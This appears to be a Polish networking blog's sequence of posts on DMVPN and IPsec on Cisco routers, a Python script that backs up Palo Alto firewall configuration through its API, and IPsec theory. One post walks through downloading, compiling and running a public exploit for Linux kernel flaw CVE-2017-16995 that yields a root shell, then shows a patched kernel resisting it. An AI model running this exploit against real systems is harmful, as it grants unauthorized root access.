 remote ident (addr/mask/prot/port): (192.168.10.4/255.255.255.255/47/0)
 current_peer 192.168.10.4 port 500
 PERMIT, flags={origin_is_acl,}
 #pkts encaps: 1, #pkts encrypt: 1, #pkts digest: 1
 #pkts decaps: 2, #pkts decrypt: 2, #pkts verify: 2
 #pkts compressed: 0, #pkts decompressed: 0
 #pkts not compressed: 0, #pkts compr. failed: 0
 #pkts not decompressed: 0, #pkts decompress failed: 0
 #send errors 0, #recv errors 0

local crypto endpt.: 192.168.10.1, remote crypto endpt.: 192.168.10.4
 path mtu 1500, ip mtu 1500, ip mtu idb (none)
 current outbound spi: 0xD87AECE3(3631934691)
 PFS (Y/N): N, DH group: none

inbound esp sas:
 spi: 0xFCF21C61(4243725409)
 transform: esp-aes esp-sha-hmac ,
 in use settings ={Transport, }
 conn id: 11, flow_id: 11, sibling_flags 80000000, crypto map: Tunnel0-head-0
 sa timing: remaining key lifetime (k/sec): (4192015/3216)
 IV size: 16 bytes
 replay detection support: Y
 Status: ACTIVE(ACTIVE)
 spi: 0x8DACF8C3(2376923331)
 transform: esp-aes esp-sha-hmac ,
 in use settings ={Transport, }
 conn id: 13, flow_id: 13, sibling_flags 80004000, crypto map: Tunnel0-head-0
 sa timing: remaining key lifetime (k/sec): (4370183/3216)
 IV size: 16 bytes
 replay detection support: Y
 Status: ACTIVE(ACTIVE)
 spi: 0xF7D288AB(4157769899)
 transform: esp-aes esp-sha-hmac ,
 in use settings ={Transport, }
 conn id: 15, flow_id: 15, sibling_flags 80004000, crypto map: Tunnel0-head-0
 sa timing: remaining key lifetime (k/sec): (4608000/3218)
 IV size: 16 bytes
 replay detection support: Y
 Status: ACTIVE(ACTIVE)

inbound ah sas:

inbound pcp sas:

outbound esp sas:
 spi: 0xE7B4AE5B(3887378011)
 transform: esp-aes esp-sha-hmac ,
 in use settings ={Transport, }
 conn id: 12, flow_id: 12, sibling_flags 80000000, crypto map: Tunnel0-head-0
 sa timing: remaining key lifetime (k/sec): (4192015/3216)
 IV size: 16 bytes
 replay detection support: Y
 Status: ACTIVE(ACTIVE)
 spi: 0x3D9E28E5(1033775333)
 transform: esp-aes esp-sha-hmac ,
 in use settings ={Transport, }
 conn id: 14, flow_id: 14, sibling_flags 80004000, crypto map: Tunnel0-head-0
 sa timing: remaining key lifetime (k/sec): (4370183/3216)
 IV size: 16 bytes
 replay detection support: Y
 Status: ACTIVE(ACTIVE)
 spi: 0xD87AECE3(3631934691)
 transform: esp-aes esp-sha-hmac ,
 in use settings ={Transport, }
 conn id: 16, flow_id: 16, sibling_flags 80004000, crypto map: Tunnel0-head-0
 sa timing: remaining key lifetime (k/sec): (4608000/3218)
 IV size: 16 bytes
 replay detection support: Y
 Status: ACTIVE(ACTIVE)

outbound ah sas:

outbound pcp sas:

Jak widać z wyników powyższych komend wszystkie tunele zestawiły się poprawnie.

WERYFIKACJA

Sprawdźmy teraz co widać w wiresharku przy pingowaniu routera R3 (SPOKE-2) z routera R2 (SPOKE-1).

SPOKE1#ping 172.22.10.3
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 172.22.10.3, timeout is 2 seconds:
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 28/40/60 ms

PODSUMOWANIE

Jak widać zgodnie z teorią IPSEC w wiresharku przy pingowaniu widzimy adresy 192.168.10.X (ponieważ skonfigurowaliśmy IPSEC w trybie transportowym), ponadto nie widzimy jaki ruch jest przesyłany. Widzimy tylko pakiety ESP które składają się z ESP SPI oraz numeru sekwencyjnego. DMVPN w połączeniu z IPSEC jest bardzo dobrą kombinacją do budowania skalowanych sieci VPN między oddziałami firmy, ponieważ przy dodawaniu nowego oddziału (SPOKE) dzięki zastosowaniu DMVPN nie musimy nic konfigurować na naszym HUBie i taki nowy oddział po skonfigurowaniu będzie miał łączność pomiędzy innymi oddziałami a IPSEC pozwoli dodatkowo zabezpieczyć transmisję.

Palo Alto API backup konfiguracji – Python skrypt

admin — Thu, 28 Dec 2017 19:45:32 +0000

Korzystając z API możemy na firewallach Palo Alto wykonywać komendy przez przeglądarkę jednym zapytaniem bez konieczności otwierania interfejsu do zarządzania i klikania po menu.

PRZYKŁAD

Do celów demonstracji możliwości API na Palo Alto posłużyłem się topologią zbudowaną z GNS3 składającą się z 3 firewalli, switcha oraz dwóch maszyn wirtualnych (gns3-webterm – do dostepu do API przez przeglądarkę, oraz NetworkAutomation – maszyna z pythonem na której będziemy pisać skrypt).

TOPOLOGIA

API

W celu dostępu do API musimy wygenerować klucz API, który będzie wykorzystywany do zapytań do API. Klucz jest generowany z użytkownika i hasła, więc jeśli posiadamy kilka firewalli i na każdym z nich mamy tego samego usera i hasło to klucz będzie taki sam dla każdego urządzenia.

Do generacji klucza służy następujące zapytanie:

https://firewall_ip/api/?type=keygen&user=username&password=password

Sprawdźmy jak to wygląda na żywo. W tym celu wchodzimy do gns3-webterm i wpisujemy w przeglądarce podany URL zamieniając firewall_ip na jeden z adresów IP firewalli oraz wpisując poprawny login i hasło:

https://192.168.0.201/api/?type=keygen&user=admin&password=admin

Jak widać z powyższego screena dostaliśmy w odpowiedzi plik XML, który zawiera klucz postaci:

LUFRPT14MW5xOEo1R09KVlBZNnpnemh0VHRBOWl6TGM9bXcwM3JHUGVhRlNiY0dCR0srNERUQT09

To samo możemy uzyskać na maszynie NetworkAutomation korzystając z programu curl i komendy:

root@NetworkAutomation-1:~# curl -X GET 'https://192.168.0.201/api/?type=keygen&user=admin&password=admin' --insecure

LUFRPT14MW5xOEo1R09KVlBZNnpnemh0VHRBOWl6TGM9bXcwM3JHUGVhRlNiY0dCR0srNERUQT09

Po otrzymaniu klucza możemy wykonać jakąś komendę przez API. Listę komend i składnię zapytań możemy znaleźć wpisując w przeglądarce https://firewall_ip/api

Do eksportu konfiguracji służy zapytanie postaci:

https://firewall_ip/api/?type=export&category=configuration&key=

gdzie to klucz otrzymany z wcześniejszej komendy. Całe zapytanie wygląda więc następująco:

https://192.168.0.201/api/?type=export&category=configuration&key=LUFRPT14MW5xOEo1R09KVlBZNnpnemh0VHRBOWl6TGM9bXcwM3JHUGVhRlNiY0dCR0srNERUQT09

W odpowiedzi dostaniemy plik xml z konfiguracją:

Spróbujmy teraz to samo uzyskać korzystając z curl’a:

root@NetworkAutomation-1:~# curl -X GET 'https://192.168.0.201/api/?type=export&category=configuration&key=LUFRPT14MW5xOEo1R09KVlBZNnpnemh0VHRBOWl6TGM9bXcwM3JHUGVhRlNiY0dCR0srNERUQT09' --insecure

fnRL/G5lXVMugyesyes5yes5yes5yes10yes5yes101010050101010050 ........

Widzimy, że otrzymaliśmy ten sam plik xml. Teraz możemy spróbować napisać skrypt, który wykona tą operację za nas i zapisze taki plik na dysk, dla każdego z firewalli.

SKRYPT

Skrypt jest bardzo prosty i wygląda nastepująco:

backup_config.py

#!/usr/bin/python

import requests, datetime
from lxml import etree

firewalls_ip = [
 '192.168.0.201',
 '192.168.0.202',
 '192.168.0.203'
]

date_1 = datetime.datetime.now().strftime("%Y-%m-%d_%H:%M")
key = 'LUFRPT14MW5xOEo1R09KVlBZNnpnemh0VHRBOWl6TGM9bXcwM3JHUGVhRlNiY0dCR0srNERUQT09'

params = (
 ('type', 'export'),
 ('category', 'configuration'),
 ('key', key),
)

for hostname in firewalls_ip:
 print "Saving config for : %s" %hostname
 url = "https://"+hostname+"/api/"
 response = requests.get(url, params=params, verify=False)
 xml_str = response.text
 root = etree.fromstring(xml_str)

 filename = "running-config-"+hostname+"-"+date_1+".xml"
 file = open(filename,"w")
 file.write("""\n""")
 file.write(etree.tostring(root, pretty_print=True))
 file.close()

Sprawdźmy jego działanie w praktyce:

root@NetworkAutomation-1:~# ./backup_config.py
Saving config for : 192.168.0.201
/usr/local/lib/python2.7/dist-packages/urllib3/connectionpool.py:858: InsecureRequestWarning: Unverified HTTPS request is being made. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings
 InsecureRequestWarning)
Saving config for : 192.168.0.202
/usr/local/lib/python2.7/dist-packages/urllib3/connectionpool.py:858: InsecureRequestWarning: Unverified HTTPS request is being made. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings
 InsecureRequestWarning)
Saving config for : 192.168.0.203
/usr/local/lib/python2.7/dist-packages/urllib3/connectionpool.py:858: InsecureRequestWarning: Unverified HTTPS request is being made. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings
 InsecureRequestWarning)

Skrypt wykonał się z ostrzeżeniami, ale możemy je zignorować. Pojawiły się one, ponieważ wszystkie urządzenia posiadają domyślne certyfikaty, które nie są zaufane.

Sprawdźmy teraz jak wygląda katalog w którym jest skrypt:

-rwxr-xr-x 1 root root 809 Dec 28 19:36 backup_config.py
-rw-r--r-- 1 root root 9161 Dec 28 19:36 running-config-192.168.0.201-2017-12-28_19:36.xml
-rw-r--r-- 1 root root 9161 Dec 28 19:36 running-config-192.168.0.202-2018-12-28_19:36.xml
-rw-r--r-- 1 root root 9161 Dec 28 19:36 running-config-192.168.0.203-2018-12-28_19:36.xml

Widać, że stworzone zostały trzy pliki zgodnie z oczekiwaniami dla każdego z firewalli. Otwórzmy teraz jeden z nich i zobaczmy jak wygląda:

root@NetworkAutomation-1:~# cat running-config-192.168.0.201-2017-12-28_19:36.xml



  
    
      
         fnRL/G5lXVMug
         
           
             yes
           
         
      
    
  
  
    
    
    
    
    
       
         
           
             yes
             5
           
     ...

PODSUMOWANIE

Jak widać API na urządzeniach Palo Alto umożliwia w łatwy sposób eksportować konfigurację, dzięki czemu w przypadku awarii urządzenia mamy kopię konfiguracji. Jest to bardzo przydatne zwłaszcza w sytuacji gdy mamy wiele firewalli do administracji. W kolejnych wpisach pokaże więcej możliwości wykorzystania API na urządzeniach Palo Alto.

Exploit na jądro Linux – podniesienie uprawnień do roota

admin — Wed, 27 Dec 2017 19:23:57 +0000

Pod poniższym linkiem można znaleźć gotowy exploit wykorzystujący podatność CVE-2017-16995

https://github.com/brl/grlh/blob/master/get-rekt-linux-hardened.c

Podatność CVE-2017-16995 została opisana dla systemu Debian pod podanym adresem:

https://security-tracker.debian.org/tracker/CVE-2017-16995

Błąd dotyczy wersji jądra >= 4.9. Listę podatnych jądr można znaleźć pod tym linkiem:

https://www.securityfocus.com/bid/102288

Więcej informacji o podatności można znaleźć tutaj:

http://seclists.org/oss-sec/2017/q4/429

EXPLOIT

Jak wykorzystać exploita, pokaże na przykładzie systemu operacyjnego Ubuntu z jądrem w wersji 4.10.0-041000-generic

Najpierw ściągnijmy kod exploita:

kuba@Ubuntu-1:~$ wget https://raw.githubusercontent.com/brl/grlh/master/get-rekt-linux-hardened.c
--2017-12-28 13:03:10-- https://raw.githubusercontent.com/brl/grlh/master/get-rekt-linux-hardened.c
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.0.133, 151.101.64.133, 151.101.128.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.0.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 11540 (11K) [text/plain]
Saving to: ‘get-rekt-linux-hardened.c’

get-rekt-linux-hard 100%[===================>] 11.27K --.-KB/s in 0.002s

2017-12-28 13:03:10 (7.06 MB/s) - ‘get-rekt-linux-hardened.c’ saved [11540/11540]

kuba@Ubuntu-1:~$ ls -l
total 148
-rw-rw-r-- 1 kuba kuba 150547 Dec 28 12:55 get-rekt-linux-hardened.c

Jak widać mój użytkownik to kuba, sprawdźmy wynik komendy id dla tego użytkownika:

kuba@Ubuntu-1:~$ id
uid=1000(kuba) gid=1000(kuba) groups=1000(kuba)

Widzimy, że użytkownik nie jest rootem, możemy więc spróbować uruchomić exploit i zdobyć uprawnienia roota.

URUCHOMIENIE EXPLOITA

Exploita musimy skompilować, a następnie uruchomić. Do kompilowania użyjemy kompilatora gcc dostępnego w systemie:

kuba@Ubuntu-1:~$ gcc -o get-rekt-linux-hardened.o get-rekt-linux-hardened.c
get-rekt-linux-hardened.c: In function ‘writemsg’:
get-rekt-linux-hardened.c:334:19: warning: format ‘%d’ expects argument of type ‘int’, but argument 3 has type ‘ssize_t {aka long int}’ [-Wformat=]
 fprintf(stderr, "short write: %d\n", n);
 ^
kuba@Ubuntu-1:~$

Przy kompilacji dostaliśmy ostrzeżenie, jednak nie musimy się nim przejmować, kod został skompilowany i w wyniku działania powyższej komendy otrzymaliśmy plik: get-rekt-linux-hardened.o

Teraz pozostało tylko uruchomienie pliku:

kuba@Ubuntu-1:~$ ./get-rekt-linux-hardened.o
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] creating socketpair()
[*] attaching bpf backdoor to socket
[*] Leaking sock struct from ffff9a4db123d800
[*] found sock->sk_rcvtimeo at offset 592
[*] found sock->sk_peer_cred
[*] hammering cred structure at ffff9a4db78f46c0
[*] credentials patched, launching shell...
#

Udało się !. Znak # sugeruje że jesteśmy teraz w shellu roota, sprawdźmy to wykonując komendę id:

# id
uid=0(root) gid=0(root) groups=0(root)

PODSUMOWANIE

Jest to świeży BUG (został upubliczniony 21.12.2017). W momencie pisania tego artykułu istnieje załatane jądro do Ubuntu w wersji 4.15-rc5. Jak zaktualizować jądro pokazywałem we wpisie: https://kubsoo.github.io/rsnet-website/ubuntu-aktualizacja-jadra-na-szybko/

Sprawdźmy jak zachowa się ten sam exploit na zaktualizowanym jądrze:

kuba@Ubuntu-1:~$ uname -a
Linux Ubuntu-1 4.15.0-041500rc5-generic #201712240530 SMP Sun Dec 24 05:31:14 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

kuba@Ubuntu-1:~$ ./get-rekt-linux-hardened.o
[.]
[.] t(-_-t) exploit for counterfeit grsec kernels such as KSPP and linux-hardened t(-_-t)
[.]
[.] ** This vulnerability cannot be exploited at all on authentic grsecurity kernel **
[.]
[*] creating bpf map
[*] sneaking evil bpf past the verifier
[*] log:
0: (b4) (u32) r2 = (u32) -1
1: (55) if r2 != 0xffffffff goto pc+2
 R1=ctx(id=0,off=0,imm=0) R2=inv-1 R10=fp0
2: (b7) r0 = 0
3: (95) exit

from 1 to 4: R1=ctx(id=0,off=0,imm=0) R2=inv4294967295 R10=fp0
4: (7b) *(u64 *)(r10 -16) = r1
5: (18) r9 = 0x0
7: (bf) r1 = r9
8: (bf) r2 = r10
9: (07) r2 += -4
10: (62) *(u32 *)(r10 -4) = 0
11: (85) call bpf_map_lookup_elem#1
12: (55) if r0 != 0x0 goto pc+1
 R0=inv0 R9=map_ptr(id=0,off=0,ks=4,vs=8) R10=fp0 fp-504=ctx
13: (95) exit

from 12 to 14: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R9=map_ptr(id=0,off=0,ks=4,vs=8) R10=fp0 fp-504=ctx
14: (79) r6 = *(u64 *)(r0 +0)
 R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R9=map_ptr(id=0,off=0,ks=4,vs=8) R10=fp0 fp-504=ctx
15: (bf) r1 = r9
16: (bf) r2 = r10
17: (07) r2 += -4
18: (62) *(u32 *)(r10 -4) = 1
19: (85) call bpf_map_lookup_elem#1
20: (55) if r0 != 0x0 goto pc+1
 R0=inv0 R6=inv(id=0) R9=map_ptr(id=0,off=0,ks=4,vs=8) R10=fp0 fp-504=ctx
21: (95) exit

from 20 to 22: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R6=inv(id=0) R9=map_ptr(id=0,off=0,ks=4,vs=8) R10=fp0 fp-504=ctx
22: (79) r7 = *(u64 *)(r0 +0)
 R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R6=inv(id=0) R9=map_ptr(id=0,off=0,ks=4,vs=8) R10=fp0 fp-504=ctx
23: (bf) r1 = r9
24: (bf) r2 = r10
25: (07) r2 += -4
26: (62) *(u32 *)(r10 -4) = 2
27: (85) call bpf_map_lookup_elem#1
28: (55) if r0 != 0x0 goto pc+1
 R0=inv0 R6=inv(id=0) R7=inv(id=0) R9=map_ptr(id=0,off=0,ks=4,vs=8) R10=fp0 fp-504=ctx
29: (95) exit

from 28 to 30: R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R6=inv(id=0) R7=inv(id=0) R9=map_ptr(id=0,off=0,ks=4,vs=8) R10=fp0 fp-504=ctx
30: (79) r8 = *(u64 *)(r0 +0)
 R0=map_value(id=0,off=0,ks=4,vs=8,imm=0) R6=inv(id=0) R7=inv(id=0) R9=map_ptr(id=0,off=0,ks=4,vs=8) R10=fp0 fp-504=ctx
31: (bf) r2 = r0
32: (b7) r0 = 0
33: (55) if r6 != 0x0 goto pc+2
 R0=inv0 R2=map_value(id=0,off=0,ks=4,vs=8,imm=0) R6=inv0 R7=inv(id=0) R8=inv(id=0) R9=map_ptr(id=0,off=0,ks=4,vs=8) R10=fp0 fp-504=ctx
34: (7b) *(u64 *)(r2 +0) = r10
R10 leaks addr into map
[!] failed to load prog 'Permission denied'

Jak widać jądro w wersji 4.15.0-041500rc5-generic jest odporne na tego exploita, więc zachęcam do szybkiego patchowania.

DMVPN faza 1 – konfiguracja

admin — Mon, 18 Dec 2017 18:17:16 +0000

Dynamic Multipoint VPN (DMVPN) faza 1, czyli tunele hub-and-spoke z dynamicznymi mapowaniami NHRP

Topologia

Konfiguracja

hostname HUB
!
interface Tunnel0
 ip address 172.22.10.1 255.255.255.0
 ip nhrp network-id 123
 tunnel source FastEthernet0/0
 tunnel mode gre multipoint
!
interface FastEthernet0/0
 ip address 192.168.10.1 255.255.255.0
!

hostname SPOKE1
!
interface Tunnel0
 ip address 172.22.10.2 255.255.255.0
 ip nhrp map 172.22.10.1 192.168.10.1
 ip nhrp network-id 123
 ip nhrp nhs 172.22.10.1
 tunnel source FastEthernet0/0
 tunnel destination 192.168.10.1
!
interface FastEthernet0/0
 ip address 192.168.10.2 255.255.255.0
!

hostname SPOKE2
!
interface Tunnel0
 ip address 172.22.10.3 255.255.255.0
 ip nhrp map 172.22.10.1 192.168.10.1
 ip nhrp network-id 123
 ip nhrp nhs 172.22.10.1
 tunnel source FastEthernet0/0
 tunnel destination 192.168.10.1
!
interface FastEthernet0/0
 ip address 192.168.10.3 255.255.255.0
!

hostname SPOKE3
!
interface Tunnel0
 ip address 172.22.10.4 255.255.255.0
 ip nhrp map 172.22.10.1 192.168.10.1
 ip nhrp network-id 123
 ip nhrp nhs 172.22.10.1
 tunnel source FastEthernet0/0
 tunnel destination 192.168.10.1
!
interface FastEthernet0/0
 ip address 192.168.10.4 255.255.255.0
!

Przydatne komendy

show dmvpn
show ip nhrp

HUB (R1)

HUB#show dmvpn
Legend: Attrb --> S - Static, D - Dynamic, I - Incomplete
 N - NATed, L - Local, X - No Socket
 # Ent --> Number of NHRP entries with same NBMA peer
 NHS Status: E --> Expecting Replies, R --> Responding, W --> Waiting
 UpDn Time --> Up or Down Time for a Tunnel
==========================================================================

Interface: Tunnel0, IPv4 NHRP Details
Type:Hub, NHRP Peers:3,

# Ent Peer NBMA Addr Peer Tunnel Add State UpDn Tm Attrb
 ----- --------------- --------------- ----- -------- -----
 1 192.168.10.2 172.22.10.2 UP 01:36:59 D
 1 192.168.10.3 172.22.10.3 UP 01:36:59 D
 1 192.168.10.4 172.22.10.4 UP 01:36:59 D

HUB#show ip nhrp
172.22.10.2/32 via 172.22.10.2
 Tunnel0 created 01:37:43, expire 01:42:15
 Type: dynamic, Flags: unique registered used
 NBMA address: 192.168.10.2
172.22.10.3/32 via 172.22.10.3
 Tunnel0 created 01:37:44, expire 01:42:15
 Type: dynamic, Flags: unique registered used
 NBMA address: 192.168.10.3
172.22.10.4/32 via 172.22.10.4
 Tunnel0 created 01:37:44, expire 01:42:15
 Type: dynamic, Flags: unique registered used
 NBMA address: 192.168.10.4

SPOKE1 (R2)

SPOKE1#show dmvpn
Legend: Attrb --> S - Static, D - Dynamic, I - Incomplete
 N - NATed, L - Local, X - No Socket
 # Ent --> Number of NHRP entries with same NBMA peer
 NHS Status: E --> Expecting Replies, R --> Responding, W --> Waiting
 UpDn Time --> Up or Down Time for a Tunnel
==========================================================================

Interface: Tunnel0, IPv4 NHRP Details
Type:Spoke, NHRP Peers:1,

# Ent Peer NBMA Addr Peer Tunnel Add State UpDn Tm Attrb
 ----- --------------- --------------- ----- -------- -----
 1 192.168.10.1 172.22.10.1 UP 01:39:36 S

SPOKE1#show ip nhrp
172.22.10.1/32 via 172.22.10.1
 Tunnel0 created 01:40:09, never expire
 Type: static, Flags:
 NBMA address: 192.168.10.1

SPOKE2 (R3)

SPOKE2#show dmvpn
Legend: Attrb --> S - Static, D - Dynamic, I - Incomplete
 N - NATed, L - Local, X - No Socket
 # Ent --> Number of NHRP entries with same NBMA peer
 NHS Status: E --> Expecting Replies, R --> Responding, W --> Waiting
 UpDn Time --> Up or Down Time for a Tunnel
==========================================================================

Interface: Tunnel0, IPv4 NHRP Details
Type:Spoke, NHRP Peers:1,

# Ent Peer NBMA Addr Peer Tunnel Add State UpDn Tm Attrb
 ----- --------------- --------------- ----- -------- -----
 1 192.168.10.1 172.22.10.1 UP 01:40:38 S

SPOKE2#show ip nhrp
172.22.10.1/32 via 172.22.10.1
 Tunnel0 created 01:41:17, never expire
 Type: static, Flags:
 NBMA address: 192.168.10.1

SPOKE3 (R4)

SPOKE3#show dmvpn
Legend: Attrb --> S - Static, D - Dynamic, I - Incomplete
 N - NATed, L - Local, X - No Socket
 # Ent --> Number of NHRP entries with same NBMA peer
 NHS Status: E --> Expecting Replies, R --> Responding, W --> Waiting
 UpDn Time --> Up or Down Time for a Tunnel
==========================================================================

Interface: Tunnel0, IPv4 NHRP Details
Type:Spoke, NHRP Peers:1,

# Ent Peer NBMA Addr Peer Tunnel Add State UpDn Tm Attrb
 ----- --------------- --------------- ----- -------- -----
 1 192.168.10.1 172.22.10.1 UP 01:41:40 S

SPOKE3#show ip nhrp
172.22.10.1/32 via 172.22.10.1
 Tunnel0 created 01:42:22, never expire
 Type: static, Flags:
 NBMA address: 192.168.10.1

WERYFIKACJA

traceroute SPOKE1 -> SPOKE2

SPOKE1#traceroute 172.22.10.3
Type escape sequence to abort.
Tracing the route to 172.22.10.3
VRF info: (vrf in name/id, vrf out name/id)
 1 172.22.10.1 20 msec 8 msec 12 msec
 2 172.22.10.3 32 msec 20 msec 24 msec

traceroute SPOKE1 -> SPOKE3

SPOKE1#traceroute 172.22.10.4
Type escape sequence to abort.
Tracing the route to 172.22.10.4
VRF info: (vrf in name/id, vrf out name/id)
 1 172.22.10.1 16 msec 8 msec 8 msec
 2 172.22.10.4 20 msec 20 msec 24 msec

traceroute SPOKE2 -> SPOKE3

SPOKE2#traceroute 172.22.10.4
Type escape sequence to abort.
Tracing the route to 172.22.10.4
VRF info: (vrf in name/id, vrf out name/id)
 1 172.22.10.1 20 msec 20 msec 12 msec
 2 172.22.10.4 20 msec 20 msec 32 msec

Jak widać ruch między oddziałami typu SPOKE (172.22.10.2,172.22.10.3,172.22.10.4) odbywa się przez HUB (172.22.10.1). Wyjaśnienie działania DMVPN oraz więcej informacji na temat pozostałych faz DMVPN w następnych wpisach.

IPSEC VPN – teoria

admin — Sun, 17 Dec 2017 20:41:10 +0000

Czym jest IPSEC ?

IPSEC jest zestawem protokołów, który pozwala na zestawianie bezpiecznego szyfrowanego tunelu pomiędzy dwoma urządzeniami sieciowymi za pośrednictwem internetu. IPSEC zapewnia uwierzytelnianie stron biorących udział w zestawieniu tunelu oraz integralność, poufność przesyłanych danych i ochronę przed atakimi powtórzeniowymi (replay protection). IPSEC służy do budowania sieci VPN w Internecie.

Funkcje bezpieczeństwa IPSEC:

1. Uwierzytelnianie

Obie strony biorące udział w zestawianiu tunelu muszą zostać uwierzytelnione, które potwierdzania tożsamości obu stron podczas komunikacji. W IPSEC istnieją 3 metody uwierzytelniania:

wstępnie uzgodnione klucze (preshared keys)
klucze RSA (klucze prywatne i publiczne)
certyfikaty

2. Integralność danych

Ta funkcja zapewnia, że dane nie zostały zmienione podczas stransmisji. Służą do tego algorytmy haszujące (SHA, MD5)

3. Poufność przesyłanych danych

Poufność przesyłanych danych w IPSEC otrzymuje się poprzez szyfrowanie danych. Rodzaje stosowanego szyfrowania (DES, 3DES, AES)

4. Ochrona odtwarzania

Zapewnia otrzymanie danego pakietu tylko raz. Jest to realizowane przez numer sekwencyjny. Każdemu pakietowi nadawany jest numer sekwencyjny. Numer sekwencyjny jest losowany i zwiększany o 1 z każdym wysłanym przez dany kanał pakietem i służy do rozpoznawania pakietów o kolejności przestawionej podczas wędrówki po sieci oraz chroni przed atakami powtórzeniowymi

Tryby IPSEC

IPSEC VPN może być skonfigurowane w dwóch trybach:

tryb tunelowy

domyślny tryb, cały pakiet IP jest szyfrowany przez IPSEC, włącznie z nagłówkiem IP, dodawany jest nowy nagłówek IP. Mówiąc to w prostych słowach, w tym trybie nie widzimy kto ze sobą rozmawia ani o czym.

tryb transportowy

obejmuje szyfrowanie samych danych, pozostawiając oryginalny nagłówek IP, nowy nagłówek jest dodawany pomiędzy nagłówkiem IP a nagłówkiem transportowym (L4)

Tryb tunelowy stosuje się między routerami/gatewayami, natomiast tryb transportowy stosuje się do tworzenia sieci VPN pomiędzy komputerami.

Nagłówki IPSEC

Protokoły wykorzystywane przez IPSEC

IPSEC korzysta z trzech podstawowych protokołów:

IKE (Internet Key Exchange)
ESP (Encapsulating Security Payload
AH (Authentication Header)

IKE (Internet Key Exchange)

Przed zestawieniem tunelu IPSec konieczne jest ustalenie związków bezpieczeństwa (Security Association). Może być to realizowane ręcznie albo przy użyciu protokołu IKE. IKE posiada dwie wersje (IKEv1 oraz IKEv2). W tym wpisie będę odwoływał się do wersji IKEv1. Wszystkie informacje o IKE można znaleźć w poniższych RFC:

https://www.ietf.org/rfc/rfc5996.txt

https://www.ietf.org/rfc/rfc2409.txt

Protokół IKE bazuje na algorytmie Diffiego-Hellmana, który pozwala w bezpieczny sposób wyznaczyć bezpieczny klucz sesji.

Nawiązanie bezpiecznej sesji IKE składa się z z dwóch faz.

faza 1 – ISAKMP phase 1 w trakcie której tworzy się IKE SA
faza 2 – w trakcie której tworzy się IPSEC SA

W fazie 1 następuje uwierzytelnienie stron komunikujących się między sobą, wybór algorytmów uwierzytelniania, ochrony poufności, integralności, sposób wyboru klucza sesji, ustalenie klucza sesji itp. Wynikiem tej fazy jest ISAKMP SA – security association, które służy dalszej ochronie komunikacji odbywającej się w fazie 2. Utworzone w fazie pierwszej SA jest dwukierunkowe. Standardowo kanał wymiany kluczy działa na porcie UDP/500. Faza 1 może być przeprowadzana w jednym z dwóch trybów:

main mode
aggressive mode

W trybie main mode przy preshared keys wymienianych jest 6 wiadomości pomiędzy stronami do utworzenia IKE SA. W trybie aggressive mode IKE SA jest tworzone po 3 wiadomościach.

LEGENDA:

SA (Security Association) – propozycje algorytmów szyfrowania, funkcji skrótu, metod uwierzytelniania, grupy DH…

klucz – służy do wygenerowania algorytmem Diffie Hellman współdzielonego klucza do szyfrowania transmisji

Ni, Nr – losowy numer, który jest użyty tylko raz i zapobiega atakom powtórzeniowym

IDii, IDir – tożsamość stron biorących udział w negocjacji IKE SA, mogą to być adresy IP lub FQDN

Hash_I, Hash_R – hash który powstaje na podstawie klucza, IDii/IDir i danych.

Nagłówek ISAKMP* – oznacza że jest to nagłówek zaszyfrowany

W fazie 2 zostanie utworzone IPSEC SA, które będzie służyć do ochrony ruchu między komunikującymi się stronami, wykorzystując protokoły ESP i AH. SA w fazie drugiej jest jednokierunkowe, więc tworzone są 2 SA dla komunikacji w obie strony.

ESP i AH

ESP (Encapsulating Security Payload):

ESP zapewnia szyfrowanie, uwierzytelnianie i integralność danych
protokół IP numer 50
większy narzut niż w AH

AH (Authentication Header):

AH zapewnia uwierzytelnianie, integralność danych, ale nie zapewnia poufności jak ESP.
protokół IP numer 51
mniejszy narzut niż w ESP

Nagłówki ESP i AH w trybie transportowym:

Konfiguracja tunelu IPSEC VPN

W moich poprzednich wpisach pokazałem jak skonfigurować tunel IPSEC pomiędzy dwoma routerami CISCO link, oraz pomiędzy routerem CISCO a firewallem Palo Alto link